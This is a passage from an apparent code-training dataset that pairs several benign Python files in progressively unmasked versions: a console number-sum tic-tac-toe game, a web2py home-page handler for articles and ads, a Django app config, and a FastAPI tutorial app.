print_board(board)\r\n print(\"\\n\"+str(board[6])+\",\", str(board[4])+\",\", \"and\", str(board[2]), \"add up to 15! \")\r\n print(\"\\n\"+winner, \"wins! \")\r\n is_game_over = True\r\n elif board[0] + board[4] + board[8] == 15 and board[0] != 0 and board[4] != 0 and board[8] != 0:\r\n print_board(board)\r\n print(\"\\n\"+str(board[0])+\",\", str(board[4])+\",\", \"and\", str(board[8]), \"add up to 15! \")\r\n print(\"\\n\"+winner, \"wins! \")\r\n is_game_over = True\r\n\r\n return is_game_over\r\n\r\n\r\n# Function that prints the scoreboard and the scores of the two players. 
Prints after a round has ended.\r\n\r\ndef score(score1, score2, player1, player2):\r\n print(\"\\n\\t------------------\")\r\n print(\"\\t SCOREBOARD\")\r\n print(\"\\t------------------\")\r\n print(\"\\t\" + \" \" + player1 + \":\", score1)\r\n print(\"\\t\" + \" \" + player2 + \":\", score2)\r\n print(\"\\t------------------\")\r\n print()\r\n\r\n\r\n# Function that is where most of the game takes place. Function calls other functions such as make_move_and_update, choose_who_first, score and other code that make up the game.\r\n# Function keeps track of the player order, the board, unavailable moves, amount of rounds and other variables. The game ends in a draw when count reaches 9. At the end of the round, it asks the users if they want to play again.\r\n\r\ndef play_game(score1, score2, player1, player2):\r\n unavailable_moves_p1 = []\r\n unavailable_moves_p2 = []\r\n player_order = []\r\n the_board = [0, 0, 0, 0, 0, 0, 0, 0, 0]\r\n count = 0\r\n restart = \"\"\r\n\r\n turn = choose_who_first(player1, player2, player_order)\r\n\r\n input(\"Enter anything to start the round: \")\r\n\r\n for i in range(10):\r\n\r\n print_board(the_board)\r\n make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)\r\n count += 1\r\n\r\n if check_game(the_board, turn):\r\n if turn == player1:\r\n score1 += 1\r\n elif turn == player2:\r\n score2 += 1\r\n break\r\n\r\n if count == 9:\r\n print(\"No numbers added up to 15, it's a DRAW! \")\r\n break\r\n\r\n if turn == player1:\r\n turn = player2\r\n else:\r\n turn = player1\r\n\r\n input(\"\\nEnter anything to continue: \")\r\n score(score1, score2, player1, player2)\r\n\r\n# Asks if the players want to restart. If yes, it calls the play_game function. If no, it ends the game and congratulates the overall winner.\r\n\r\n while restart != \"yes\" or restart != \"y\" or restart != \"n\" or restart != \"no\":\r\n restart = input(\"Do want to play Again? 
(y/n) \").lower()\r\n if restart == \"y\" or restart == \"yes\":\r\n print(\"\\nLoading new round...\")\r\n play_game(score1, score2, player1, player2)\r\n elif restart == \"n\" or restart == \"no\":\r\n if score1 > score2:\r\n print(\"\\n\"+player1, \"is the overall winner! Congratulations!\")\r\n elif score2 > score1:\r\n print(\"\\n\"+player2, \"is the overall winner! Congratulations!\")\r\n elif score1 == score2:\r\n print(\"\\nBoth players have one the same amount of rounds. It's a draw! \")\r\n print(\"\\nThanks for playing! \")\r\n break\r\n else:\r\n print(\"\\nPlease enter YES or NO \")\r\n print()\r\n\r\n\r\n# This code manages the important things before the actual game starts such as the instructions, usernames, etc. Calls the play_game function.\r\n\r\nif __name__ == \"__main__\":\r\n intro()\r\n\r\n input(\"Enter anything to continue: \")\r\n\r\n print(\"\\nEnter usernames: \")\r\n name1 = input(\"\\nPlayer 1, Enter your name: \").title()\r\n name2 = input(\"\\nPlayer 2, Enter your name: \").title()\r\n\r\n p1_score = 0\r\n p2_score = 0\r\n play_game(p1_score, p2_score, name1, name2)\r\n",
"step-ids": [
6,
7,
8,
9,
10
]
}
|
[
6,
7,
8,
9,
10
] |
<|reserved_special_token_0|>
class Home(Base):
<|reserved_special_token_0|>
def pre_render(self):
self.response = self.db.response
self.request = self.db.request
self.config = self.db.config
self.response.meta.title = self.db.config.meta.title
self.response.meta.description = self.db.config.meta.description
self.response.meta.keywords = self.db.config.meta.keywords
self.context.use_facebook = self.db.config.auth.use_facebook
<|reserved_special_token_0|>
def ads(self):
self.context.ads = self.db(self.db.Ads.place == 'top_slider').select(
limitby=(0, 5), orderby='<random>')
if not self.context.ads:
from gluon.storage import Storage
self.context.ads = [Storage(id=1, thumbnail='', link=self.db.
CURL('contact', 'ads')), Storage(id=2, thumbnail=
'http://placehold.it/250x220&text=%s' % self.db.T(
'Your add here!'), link=self.db.CURL('contact', 'ads')),
Storage(id=3, thumbnail='http://placekitten.com/250/220',
link=self.db.CURL('contact', 'ads')), Storage(id=3,
thumbnail='http://placehold.it/250x220&text=%s' % self.db.T
('Your Logo'), link=self.db.CURL('contact', 'ads'))]
def featured(self):
self.context.featured = self.db(self.db.Article.featured == True
).select(limitby=(0, 4), orderby='<random>')
if not self.context.featured:
self.context.featured = self.db(self.db.Article).select(limitby
=(0, 4), orderby=~self.db.Article.likes)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Home(Base):
def start(self):
from movuca import DataBase, User
from datamodel.article import Article, ContentType, Category
from datamodel.ads import Ads
self.db = DataBase([User, ContentType, Category, Article, Ads])
def pre_render(self):
self.response = self.db.response
self.request = self.db.request
self.config = self.db.config
self.response.meta.title = self.db.config.meta.title
self.response.meta.description = self.db.config.meta.description
self.response.meta.keywords = self.db.config.meta.keywords
self.context.use_facebook = self.db.config.auth.use_facebook
<|reserved_special_token_0|>
def ads(self):
self.context.ads = self.db(self.db.Ads.place == 'top_slider').select(
limitby=(0, 5), orderby='<random>')
if not self.context.ads:
from gluon.storage import Storage
self.context.ads = [Storage(id=1, thumbnail='', link=self.db.
CURL('contact', 'ads')), Storage(id=2, thumbnail=
'http://placehold.it/250x220&text=%s' % self.db.T(
'Your add here!'), link=self.db.CURL('contact', 'ads')),
Storage(id=3, thumbnail='http://placekitten.com/250/220',
link=self.db.CURL('contact', 'ads')), Storage(id=3,
thumbnail='http://placehold.it/250x220&text=%s' % self.db.T
('Your Logo'), link=self.db.CURL('contact', 'ads'))]
def featured(self):
self.context.featured = self.db(self.db.Article.featured == True
).select(limitby=(0, 4), orderby='<random>')
if not self.context.featured:
self.context.featured = self.db(self.db.Article).select(limitby
=(0, 4), orderby=~self.db.Article.likes)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Home(Base):
def start(self):
from movuca import DataBase, User
from datamodel.article import Article, ContentType, Category
from datamodel.ads import Ads
self.db = DataBase([User, ContentType, Category, Article, Ads])
def pre_render(self):
self.response = self.db.response
self.request = self.db.request
self.config = self.db.config
self.response.meta.title = self.db.config.meta.title
self.response.meta.description = self.db.config.meta.description
self.response.meta.keywords = self.db.config.meta.keywords
self.context.use_facebook = self.db.config.auth.use_facebook
def last_articles(self):
from helpers.article import latest_articles
self.context.latest_articles = latest_articles(self.db)
def ads(self):
self.context.ads = self.db(self.db.Ads.place == 'top_slider').select(
limitby=(0, 5), orderby='<random>')
if not self.context.ads:
from gluon.storage import Storage
self.context.ads = [Storage(id=1, thumbnail='', link=self.db.
CURL('contact', 'ads')), Storage(id=2, thumbnail=
'http://placehold.it/250x220&text=%s' % self.db.T(
'Your add here!'), link=self.db.CURL('contact', 'ads')),
Storage(id=3, thumbnail='http://placekitten.com/250/220',
link=self.db.CURL('contact', 'ads')), Storage(id=3,
thumbnail='http://placehold.it/250x220&text=%s' % self.db.T
('Your Logo'), link=self.db.CURL('contact', 'ads'))]
def featured(self):
self.context.featured = self.db(self.db.Article.featured == True
).select(limitby=(0, 4), orderby='<random>')
if not self.context.featured:
self.context.featured = self.db(self.db.Article).select(limitby
=(0, 4), orderby=~self.db.Article.likes)
<|reserved_special_token_1|>
from handlers.base import Base
class Home(Base):
def start(self):
from movuca import DataBase, User
from datamodel.article import Article, ContentType, Category
from datamodel.ads import Ads
self.db = DataBase([User, ContentType, Category, Article, Ads])
def pre_render(self):
self.response = self.db.response
self.request = self.db.request
self.config = self.db.config
self.response.meta.title = self.db.config.meta.title
self.response.meta.description = self.db.config.meta.description
self.response.meta.keywords = self.db.config.meta.keywords
self.context.use_facebook = self.db.config.auth.use_facebook
def last_articles(self):
from helpers.article import latest_articles
self.context.latest_articles = latest_articles(self.db)
def ads(self):
self.context.ads = self.db(self.db.Ads.place == 'top_slider').select(
limitby=(0, 5), orderby='<random>')
if not self.context.ads:
from gluon.storage import Storage
self.context.ads = [Storage(id=1, thumbnail='', link=self.db.
CURL('contact', 'ads')), Storage(id=2, thumbnail=
'http://placehold.it/250x220&text=%s' % self.db.T(
'Your add here!'), link=self.db.CURL('contact', 'ads')),
Storage(id=3, thumbnail='http://placekitten.com/250/220',
link=self.db.CURL('contact', 'ads')), Storage(id=3,
thumbnail='http://placehold.it/250x220&text=%s' % self.db.T
('Your Logo'), link=self.db.CURL('contact', 'ads'))]
def featured(self):
self.context.featured = self.db(self.db.Article.featured == True
).select(limitby=(0, 4), orderby='<random>')
if not self.context.featured:
self.context.featured = self.db(self.db.Article).select(limitby
=(0, 4), orderby=~self.db.Article.likes)
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
from handlers.base import Base
class Home(Base):
def start(self):
from movuca import DataBase, User
from datamodel.article import Article, ContentType, Category
from datamodel.ads import Ads
self.db = DataBase([User, ContentType, Category, Article, Ads])
def pre_render(self):
# obrigatorio ter um config, um self.response|request, que tenha um render self.response.render
self.response = self.db.response
self.request = self.db.request
self.config = self.db.config
#self.view = "app/home.html"
self.response.meta.title = self.db.config.meta.title
self.response.meta.description = self.db.config.meta.description
self.response.meta.keywords = self.db.config.meta.keywords
self.context.use_facebook = self.db.config.auth.use_facebook
def last_articles(self):
from helpers.article import latest_articles
self.context.latest_articles = latest_articles(self.db)
def ads(self):
self.context.ads = self.db(self.db.Ads.place == "top_slider").select(limitby=(0, 5), orderby="<random>")
if not self.context.ads:
from gluon.storage import Storage
self.context.ads = [Storage(id=1, thumbnail='', link=self.db.CURL('contact', 'ads')),
Storage(id=2, thumbnail="http://placehold.it/250x220&text=%s" % self.db.T("Your add here!"), link=self.db.CURL('contact', 'ads')),
Storage(id=3, thumbnail="http://placekitten.com/250/220", link=self.db.CURL('contact', 'ads')),
Storage(id=3, thumbnail="http://placehold.it/250x220&text=%s" % self.db.T("Your Logo"), link=self.db.CURL('contact', 'ads'))
]
def featured(self):
self.context.featured = self.db(self.db.Article.featured == True).select(limitby=(0, 4), orderby="<random>")
if not self.context.featured:
self.context.featured = self.db(self.db.Article).select(limitby=(0, 4), orderby=~self.db.Article.likes)
|
flexible
|
{
"blob_id": "9d0d4707cc9a654752dd0b98fe0fec6a0c1419a1",
"index": 3029,
"step-1": "<mask token>\n\n\nclass Home(Base):\n <mask token>\n\n def pre_render(self):\n self.response = self.db.response\n self.request = self.db.request\n self.config = self.db.config\n self.response.meta.title = self.db.config.meta.title\n self.response.meta.description = self.db.config.meta.description\n self.response.meta.keywords = self.db.config.meta.keywords\n self.context.use_facebook = self.db.config.auth.use_facebook\n <mask token>\n\n def ads(self):\n self.context.ads = self.db(self.db.Ads.place == 'top_slider').select(\n limitby=(0, 5), orderby='<random>')\n if not self.context.ads:\n from gluon.storage import Storage\n self.context.ads = [Storage(id=1, thumbnail='', link=self.db.\n CURL('contact', 'ads')), Storage(id=2, thumbnail=\n 'http://placehold.it/250x220&text=%s' % self.db.T(\n 'Your add here!'), link=self.db.CURL('contact', 'ads')),\n Storage(id=3, thumbnail='http://placekitten.com/250/220',\n link=self.db.CURL('contact', 'ads')), Storage(id=3,\n thumbnail='http://placehold.it/250x220&text=%s' % self.db.T\n ('Your Logo'), link=self.db.CURL('contact', 'ads'))]\n\n def featured(self):\n self.context.featured = self.db(self.db.Article.featured == True\n ).select(limitby=(0, 4), orderby='<random>')\n if not self.context.featured:\n self.context.featured = self.db(self.db.Article).select(limitby\n =(0, 4), orderby=~self.db.Article.likes)\n",
"step-2": "<mask token>\n\n\nclass Home(Base):\n\n def start(self):\n from movuca import DataBase, User\n from datamodel.article import Article, ContentType, Category\n from datamodel.ads import Ads\n self.db = DataBase([User, ContentType, Category, Article, Ads])\n\n def pre_render(self):\n self.response = self.db.response\n self.request = self.db.request\n self.config = self.db.config\n self.response.meta.title = self.db.config.meta.title\n self.response.meta.description = self.db.config.meta.description\n self.response.meta.keywords = self.db.config.meta.keywords\n self.context.use_facebook = self.db.config.auth.use_facebook\n <mask token>\n\n def ads(self):\n self.context.ads = self.db(self.db.Ads.place == 'top_slider').select(\n limitby=(0, 5), orderby='<random>')\n if not self.context.ads:\n from gluon.storage import Storage\n self.context.ads = [Storage(id=1, thumbnail='', link=self.db.\n CURL('contact', 'ads')), Storage(id=2, thumbnail=\n 'http://placehold.it/250x220&text=%s' % self.db.T(\n 'Your add here!'), link=self.db.CURL('contact', 'ads')),\n Storage(id=3, thumbnail='http://placekitten.com/250/220',\n link=self.db.CURL('contact', 'ads')), Storage(id=3,\n thumbnail='http://placehold.it/250x220&text=%s' % self.db.T\n ('Your Logo'), link=self.db.CURL('contact', 'ads'))]\n\n def featured(self):\n self.context.featured = self.db(self.db.Article.featured == True\n ).select(limitby=(0, 4), orderby='<random>')\n if not self.context.featured:\n self.context.featured = self.db(self.db.Article).select(limitby\n =(0, 4), orderby=~self.db.Article.likes)\n",
"step-3": "<mask token>\n\n\nclass Home(Base):\n\n def start(self):\n from movuca import DataBase, User\n from datamodel.article import Article, ContentType, Category\n from datamodel.ads import Ads\n self.db = DataBase([User, ContentType, Category, Article, Ads])\n\n def pre_render(self):\n self.response = self.db.response\n self.request = self.db.request\n self.config = self.db.config\n self.response.meta.title = self.db.config.meta.title\n self.response.meta.description = self.db.config.meta.description\n self.response.meta.keywords = self.db.config.meta.keywords\n self.context.use_facebook = self.db.config.auth.use_facebook\n\n def last_articles(self):\n from helpers.article import latest_articles\n self.context.latest_articles = latest_articles(self.db)\n\n def ads(self):\n self.context.ads = self.db(self.db.Ads.place == 'top_slider').select(\n limitby=(0, 5), orderby='<random>')\n if not self.context.ads:\n from gluon.storage import Storage\n self.context.ads = [Storage(id=1, thumbnail='', link=self.db.\n CURL('contact', 'ads')), Storage(id=2, thumbnail=\n 'http://placehold.it/250x220&text=%s' % self.db.T(\n 'Your add here!'), link=self.db.CURL('contact', 'ads')),\n Storage(id=3, thumbnail='http://placekitten.com/250/220',\n link=self.db.CURL('contact', 'ads')), Storage(id=3,\n thumbnail='http://placehold.it/250x220&text=%s' % self.db.T\n ('Your Logo'), link=self.db.CURL('contact', 'ads'))]\n\n def featured(self):\n self.context.featured = self.db(self.db.Article.featured == True\n ).select(limitby=(0, 4), orderby='<random>')\n if not self.context.featured:\n self.context.featured = self.db(self.db.Article).select(limitby\n =(0, 4), orderby=~self.db.Article.likes)\n",
"step-4": "from handlers.base import Base\n\n\nclass Home(Base):\n\n def start(self):\n from movuca import DataBase, User\n from datamodel.article import Article, ContentType, Category\n from datamodel.ads import Ads\n self.db = DataBase([User, ContentType, Category, Article, Ads])\n\n def pre_render(self):\n self.response = self.db.response\n self.request = self.db.request\n self.config = self.db.config\n self.response.meta.title = self.db.config.meta.title\n self.response.meta.description = self.db.config.meta.description\n self.response.meta.keywords = self.db.config.meta.keywords\n self.context.use_facebook = self.db.config.auth.use_facebook\n\n def last_articles(self):\n from helpers.article import latest_articles\n self.context.latest_articles = latest_articles(self.db)\n\n def ads(self):\n self.context.ads = self.db(self.db.Ads.place == 'top_slider').select(\n limitby=(0, 5), orderby='<random>')\n if not self.context.ads:\n from gluon.storage import Storage\n self.context.ads = [Storage(id=1, thumbnail='', link=self.db.\n CURL('contact', 'ads')), Storage(id=2, thumbnail=\n 'http://placehold.it/250x220&text=%s' % self.db.T(\n 'Your add here!'), link=self.db.CURL('contact', 'ads')),\n Storage(id=3, thumbnail='http://placekitten.com/250/220',\n link=self.db.CURL('contact', 'ads')), Storage(id=3,\n thumbnail='http://placehold.it/250x220&text=%s' % self.db.T\n ('Your Logo'), link=self.db.CURL('contact', 'ads'))]\n\n def featured(self):\n self.context.featured = self.db(self.db.Article.featured == True\n ).select(limitby=(0, 4), orderby='<random>')\n if not self.context.featured:\n self.context.featured = self.db(self.db.Article).select(limitby\n =(0, 4), orderby=~self.db.Article.likes)\n",
"step-5": "# -*- coding: utf-8 -*-\n\nfrom handlers.base import Base\n\n\nclass Home(Base):\n def start(self):\n from movuca import DataBase, User\n from datamodel.article import Article, ContentType, Category\n from datamodel.ads import Ads\n self.db = DataBase([User, ContentType, Category, Article, Ads])\n\n def pre_render(self):\n # obrigatorio ter um config, um self.response|request, que tenha um render self.response.render\n self.response = self.db.response\n self.request = self.db.request\n self.config = self.db.config\n #self.view = \"app/home.html\"\n self.response.meta.title = self.db.config.meta.title\n self.response.meta.description = self.db.config.meta.description\n self.response.meta.keywords = self.db.config.meta.keywords\n self.context.use_facebook = self.db.config.auth.use_facebook\n\n def last_articles(self):\n from helpers.article import latest_articles\n self.context.latest_articles = latest_articles(self.db)\n\n def ads(self):\n self.context.ads = self.db(self.db.Ads.place == \"top_slider\").select(limitby=(0, 5), orderby=\"<random>\")\n if not self.context.ads:\n from gluon.storage import Storage\n self.context.ads = [Storage(id=1, thumbnail='', link=self.db.CURL('contact', 'ads')),\n Storage(id=2, thumbnail=\"http://placehold.it/250x220&text=%s\" % self.db.T(\"Your add here!\"), link=self.db.CURL('contact', 'ads')),\n Storage(id=3, thumbnail=\"http://placekitten.com/250/220\", link=self.db.CURL('contact', 'ads')),\n Storage(id=3, thumbnail=\"http://placehold.it/250x220&text=%s\" % self.db.T(\"Your Logo\"), link=self.db.CURL('contact', 'ads'))\n ]\n\n def featured(self):\n self.context.featured = self.db(self.db.Article.featured == True).select(limitby=(0, 4), orderby=\"<random>\")\n if not self.context.featured:\n self.context.featured = self.db(self.db.Article).select(limitby=(0, 4), orderby=~self.db.Article.likes)\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
from django.apps import AppConfig
class FosAppConfig(AppConfig):
name = 'fos_app'
|
normal
|
{
"blob_id": "d83f2d9bb25a46bc7344b420ce65bf729165e6b9",
"index": 278,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass FosAppConfig(AppConfig):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass FosAppConfig(AppConfig):\n name = 'fos_app'\n",
"step-4": "from django.apps import AppConfig\n\n\nclass FosAppConfig(AppConfig):\n name = 'fos_app'\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from fastapi import FastAPI, Header, Cookie, Form, Request, requests, Body, Response, HTTPException, status, Path, Query
from fastapi.responses import HTMLResponse
from typing import Optional
from fastapi.testclient import TestClient
from typing import List, Callable
from fastapi.staticfiles import StaticFiles
from fastapi.templating import Jinja2Templates
from fastapi.exceptions import RequestValidationError
from fastapi.routing import APIRoute
from starlette.responses import JSONResponse
from pydantic import BaseModel
import uvicorn
import time
payloads = {
'peoples': [
{
'firstname': 'watcharapon',
'lastname': 'weeraborirak',
'age': '24',
'city': 'bangkok'
},
{
'firstname': 'somsak',
'lastname': 'tamjai',
'age': '22',
'city': 'bangkok'
},
{
'firstname': 'rakkana',
'lastname': 'meejai',
'age': '66',
'city': 'outcast'
},
]
}
class Item(BaseModel):
name: str
price: float
class ValidationError(APIRoute):
def get_route_handler(self) -> Callable:
original_route_handler = super().get_route_handler()
async def customer_route_handler(request: Request) -> Response:
try:
return await original_route_handler(request)
except RequestValidationError as exc:
body = await request.body()
detail = {'error': exc.errors(), 'body': body.decode()}
raise HTTPException(status_code=200, detail=detail)
return customer_route_handler
app = FastAPI()
app.router.route_class = ValidationError
app.mount('/static', StaticFiles(directory='static'), name='static')
templates = Jinja2Templates(directory='templates')
client = TestClient(app)
@app.middleware('http')
async def add_process_time_header(request: Request, call_next):
start_time = time.time()
response = await call_next(request)
process_time = time.time() - start_time
response.headers['X-Process-Time'] = '{}'.format(str(round(process_time, 4)))
return response
@app.middleware('http')
async def add_process_name(request: Request, call_next):
response = await call_next(request)
response.headers['X-Owner-Server'] = 'Kane'
return response
@app.post('/items')
async def base_model(item: Item):
item_dict = item.dict()
return {'message': item_dict}
@app.put('/items/{item_id}')
async def item_id(item_id: int, item: Item):
return {'item_id': item_id, **item.dict()}
@app.get("/items_id/{item_id}")
async def read_items(
item_id: int = Path(..., title="The ID of the item to get"),
q: Optional[str] = Query(None, alias="item-query")
):
results = {"item_id": item_id}
if q:
results.update({"q": q})
return results
@app.get('/peoples')
async def fetch_movies(query: str = None): # query param string
payload = [p[query] for p in payloads['peoples']]
return payload
@app.get('/member')
async def member(item: Item, X_Item_ID: str = Header(...)): # Header
print(X_Item_ID)
if X_Item_ID != 'member':
raise HTTPException(status_code=400, detail="X-Item-ID header invalid")
return JSONResponse(content={item.name: 'kane', item.price: 123.33})
@app.get('/member/token')
async def member_token(x_token: str = Cookie(None)):
print(x_token)
return {'message': f'success cookie {x_token}'}
@app.get('/api_body/{item_id}') # dynamic route
async def api_body(item_id: str):
return {'item_id': item_id}
@app.post('/payload_request', response_model=Item, status_code=status.HTTP_201_CREATED)
async def payload_request(item: Item):
return item
@app.post("/payload_json")
async def create_item(payload: dict = Body(...)):
print(payload)
return payload
@app.post('/form_data')
async def form_data(password: str = Form(...), username: str = Form(...)):
return {'message': {'user': username, 'pwd': password}}
@app.post('/cookies')
async def cookies(response: Response):
response.set_cookie(key='foo', value='value')
return {'message': 'cookies darken'}
@app.get('/')
@app.get('/index', tags=['dashboard'])
async def index(request: Request):
return templates.TemplateResponse('template_fastapi/login.vue', context={'request': request})
@app.get("/func_element", response_model=Item, tags=["Description"], deprecated=True)
async def func_element(item: Item):
"""
Get Data Element:
- **name**: my_name
- **price**: price
"""
return item
@app.post("/func_item", response_model=Item, tags=["Description"], summary="Create an item",
description="Create an item with all the , name, description, price, tax and a set of unique tags")
async def fuc_item(item: Item):
update_item = item.dict()
update_item['name'] = 'kane_ja'
return update_item
@app.post('/json_response', response_model=Item, tags=['Description'])
async def json_response(item: Item):
"""
Return JsonResponse
- **Item**: name
- **status**: 201
"""
return JSONResponse(content={item.name: 'kaneeang'}, status_code=201)
if __name__ == '__main__':
uvicorn.run('fastapi_route_config:app', debug=True, port=8080)
|
normal
|
{
"blob_id": "70188d011ef60b1586864c4b85a9f9e70e5a4caf",
"index": 7386,
"step-1": "<mask token>\n\n\nclass Item(BaseModel):\n name: str\n price: float\n\n\nclass ValidationError(APIRoute):\n\n def get_route_handler(self) ->Callable:\n original_route_handler = super().get_route_handler()\n\n async def customer_route_handler(request: Request) ->Response:\n try:\n return await original_route_handler(request)\n except RequestValidationError as exc:\n body = await request.body()\n detail = {'error': exc.errors(), 'body': body.decode()}\n raise HTTPException(status_code=200, detail=detail)\n return customer_route_handler\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Item(BaseModel):\n name: str\n price: float\n\n\nclass ValidationError(APIRoute):\n\n def get_route_handler(self) ->Callable:\n original_route_handler = super().get_route_handler()\n\n async def customer_route_handler(request: Request) ->Response:\n try:\n return await original_route_handler(request)\n except RequestValidationError as exc:\n body = await request.body()\n detail = {'error': exc.errors(), 'body': body.decode()}\n raise HTTPException(status_code=200, detail=detail)\n return customer_route_handler\n\n\n<mask token>\napp.mount('/static', StaticFiles(directory='static'), name='static')\n<mask token>\n\n\n@app.middleware('http')\nasync def add_process_time_header(request: Request, call_next):\n start_time = time.time()\n response = await call_next(request)\n process_time = time.time() - start_time\n response.headers['X-Process-Time'] = '{}'.format(str(round(process_time,\n 4)))\n return response\n\n\n@app.middleware('http')\nasync def add_process_name(request: Request, call_next):\n response = await call_next(request)\n response.headers['X-Owner-Server'] = 'Kane'\n return response\n\n\n@app.post('/items')\nasync def base_model(item: Item):\n item_dict = item.dict()\n return {'message': item_dict}\n\n\n@app.put('/items/{item_id}')\nasync def item_id(item_id: int, item: Item):\n return {'item_id': item_id, **item.dict()}\n\n\n@app.get('/items_id/{item_id}')\nasync def read_items(item_id: int=Path(..., title=\n 'The ID of the item to get'), q: Optional[str]=Query(None, alias=\n 'item-query')):\n results = {'item_id': item_id}\n if q:\n results.update({'q': q})\n return results\n\n\n@app.get('/peoples')\nasync def fetch_movies(query: str=None):\n payload = [p[query] for p in payloads['peoples']]\n return payload\n\n\n@app.get('/member')\nasync def member(item: Item, X_Item_ID: str=Header(...)):\n print(X_Item_ID)\n if X_Item_ID != 'member':\n raise HTTPException(status_code=400, detail='X-Item-ID header invalid')\n return 
JSONResponse(content={item.name: 'kane', item.price: 123.33})\n\n\n@app.get('/member/token')\nasync def member_token(x_token: str=Cookie(None)):\n print(x_token)\n return {'message': f'success cookie {x_token}'}\n\n\n@app.get('/api_body/{item_id}')\nasync def api_body(item_id: str):\n return {'item_id': item_id}\n\n\n@app.post('/payload_request', response_model=Item, status_code=status.\n HTTP_201_CREATED)\nasync def payload_request(item: Item):\n return item\n\n\n@app.post('/payload_json')\nasync def create_item(payload: dict=Body(...)):\n print(payload)\n return payload\n\n\n@app.post('/form_data')\nasync def form_data(password: str=Form(...), username: str=Form(...)):\n return {'message': {'user': username, 'pwd': password}}\n\n\n@app.post('/cookies')\nasync def cookies(response: Response):\n response.set_cookie(key='foo', value='value')\n return {'message': 'cookies darken'}\n\n\n@app.get('/')\n@app.get('/index', tags=['dashboard'])\nasync def index(request: Request):\n return templates.TemplateResponse('template_fastapi/login.vue', context\n ={'request': request})\n\n\n@app.get('/func_element', response_model=Item, tags=['Description'],\n deprecated=True)\nasync def func_element(item: Item):\n \"\"\"\n Get Data Element:\n - **name**: my_name\n - **price**: price\n \"\"\"\n return item\n\n\n@app.post('/func_item', response_model=Item, tags=['Description'], summary=\n 'Create an item', description=\n 'Create an item with all the , name, description, price, tax and a set of unique tags'\n )\nasync def fuc_item(item: Item):\n update_item = item.dict()\n update_item['name'] = 'kane_ja'\n return update_item\n\n\n@app.post('/json_response', response_model=Item, tags=['Description'])\nasync def json_response(item: Item):\n \"\"\"\n Return JsonResponse\n - **Item**: name\n - **status**: 201\n \"\"\"\n return JSONResponse(content={item.name: 'kaneeang'}, status_code=201)\n\n\nif __name__ == '__main__':\n uvicorn.run('fastapi_route_config:app', debug=True, port=8080)\n",
"step-3": "<mask token>\npayloads = {'peoples': [{'firstname': 'watcharapon', 'lastname':\n 'weeraborirak', 'age': '24', 'city': 'bangkok'}, {'firstname': 'somsak',\n 'lastname': 'tamjai', 'age': '22', 'city': 'bangkok'}, {'firstname':\n 'rakkana', 'lastname': 'meejai', 'age': '66', 'city': 'outcast'}]}\n\n\nclass Item(BaseModel):\n name: str\n price: float\n\n\nclass ValidationError(APIRoute):\n\n def get_route_handler(self) ->Callable:\n original_route_handler = super().get_route_handler()\n\n async def customer_route_handler(request: Request) ->Response:\n try:\n return await original_route_handler(request)\n except RequestValidationError as exc:\n body = await request.body()\n detail = {'error': exc.errors(), 'body': body.decode()}\n raise HTTPException(status_code=200, detail=detail)\n return customer_route_handler\n\n\napp = FastAPI()\napp.router.route_class = ValidationError\napp.mount('/static', StaticFiles(directory='static'), name='static')\ntemplates = Jinja2Templates(directory='templates')\nclient = TestClient(app)\n\n\n@app.middleware('http')\nasync def add_process_time_header(request: Request, call_next):\n start_time = time.time()\n response = await call_next(request)\n process_time = time.time() - start_time\n response.headers['X-Process-Time'] = '{}'.format(str(round(process_time,\n 4)))\n return response\n\n\n@app.middleware('http')\nasync def add_process_name(request: Request, call_next):\n response = await call_next(request)\n response.headers['X-Owner-Server'] = 'Kane'\n return response\n\n\n@app.post('/items')\nasync def base_model(item: Item):\n item_dict = item.dict()\n return {'message': item_dict}\n\n\n@app.put('/items/{item_id}')\nasync def item_id(item_id: int, item: Item):\n return {'item_id': item_id, **item.dict()}\n\n\n@app.get('/items_id/{item_id}')\nasync def read_items(item_id: int=Path(..., title=\n 'The ID of the item to get'), q: Optional[str]=Query(None, alias=\n 'item-query')):\n results = {'item_id': item_id}\n if q:\n 
results.update({'q': q})\n return results\n\n\n@app.get('/peoples')\nasync def fetch_movies(query: str=None):\n payload = [p[query] for p in payloads['peoples']]\n return payload\n\n\n@app.get('/member')\nasync def member(item: Item, X_Item_ID: str=Header(...)):\n print(X_Item_ID)\n if X_Item_ID != 'member':\n raise HTTPException(status_code=400, detail='X-Item-ID header invalid')\n return JSONResponse(content={item.name: 'kane', item.price: 123.33})\n\n\n@app.get('/member/token')\nasync def member_token(x_token: str=Cookie(None)):\n print(x_token)\n return {'message': f'success cookie {x_token}'}\n\n\n@app.get('/api_body/{item_id}')\nasync def api_body(item_id: str):\n return {'item_id': item_id}\n\n\n@app.post('/payload_request', response_model=Item, status_code=status.\n HTTP_201_CREATED)\nasync def payload_request(item: Item):\n return item\n\n\n@app.post('/payload_json')\nasync def create_item(payload: dict=Body(...)):\n print(payload)\n return payload\n\n\n@app.post('/form_data')\nasync def form_data(password: str=Form(...), username: str=Form(...)):\n return {'message': {'user': username, 'pwd': password}}\n\n\n@app.post('/cookies')\nasync def cookies(response: Response):\n response.set_cookie(key='foo', value='value')\n return {'message': 'cookies darken'}\n\n\n@app.get('/')\n@app.get('/index', tags=['dashboard'])\nasync def index(request: Request):\n return templates.TemplateResponse('template_fastapi/login.vue', context\n ={'request': request})\n\n\n@app.get('/func_element', response_model=Item, tags=['Description'],\n deprecated=True)\nasync def func_element(item: Item):\n \"\"\"\n Get Data Element:\n - **name**: my_name\n - **price**: price\n \"\"\"\n return item\n\n\n@app.post('/func_item', response_model=Item, tags=['Description'], summary=\n 'Create an item', description=\n 'Create an item with all the , name, description, price, tax and a set of unique tags'\n )\nasync def fuc_item(item: Item):\n update_item = item.dict()\n update_item['name'] = 
